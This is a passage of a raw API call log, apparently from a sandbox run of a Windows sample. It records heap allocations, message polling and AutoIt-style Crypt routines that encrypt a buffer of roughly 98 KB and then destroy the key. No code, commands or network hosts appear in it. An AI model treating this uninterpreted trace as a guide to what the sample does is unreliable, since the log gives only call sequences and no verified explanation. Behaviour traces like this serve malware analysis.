returned 0x9bdae0 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0198.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0198.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0198.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0198.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0198.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0198.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0198.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0198.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0198.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0198.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0198.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0198.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0198.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0198.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0198.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0198.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0198.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0198.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0198.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0198.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0198.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0198.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0198.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0198.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0198.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0198.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0198.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0198.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0198.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0198.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0198.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0198.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0198.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0198.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0198.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0198.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0198.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0198.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0198.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0198.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0198.110] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0198.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0198.110] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c27e8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27e8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0198.110] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.110] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.111] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0198.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0198.111] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.111] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0198.111] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.111] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.111] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.111] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0198.111] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.111] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0198.111] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.111] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.111] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.111] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0198.111] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.111] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0198.112] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.112] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.112] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x180a6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x180b0) returned 1 [0198.112] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.112] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0198.112] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.112] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.112] CharLowerBuffW (in: lpsz="byte[98481]", cchLength=0xb | out: lpsz="byte[98481]") returned 0xb [0198.112] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.114] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.114] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.114] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.116] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.116] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa8f168*, pdwDataLen=0x87e820*=0x180a6, dwBufLen=0x180b0 | out: pbData=0xa8f168*, pdwDataLen=0x87e820*=0x180b0) returned 1 [0198.117] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.117] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0198.117] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.119] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.119] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.119] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.119] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0198.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.119] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.119] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.119] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.120] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0198.120] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.120] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.120] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.120] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.120] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0198.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0198.120] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.130] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.130] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.130] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.150] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.150] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.150] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0198.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.150] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.150] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0198.150] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0198.151] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.151] CryptDestroyKey (hKey=0x90aed8) returned 1 [0198.151] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.151] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0198.151] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0198.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.151] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0198.151] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0198.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0198.151] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0198.151] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0198.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.151] HeapFree (in: 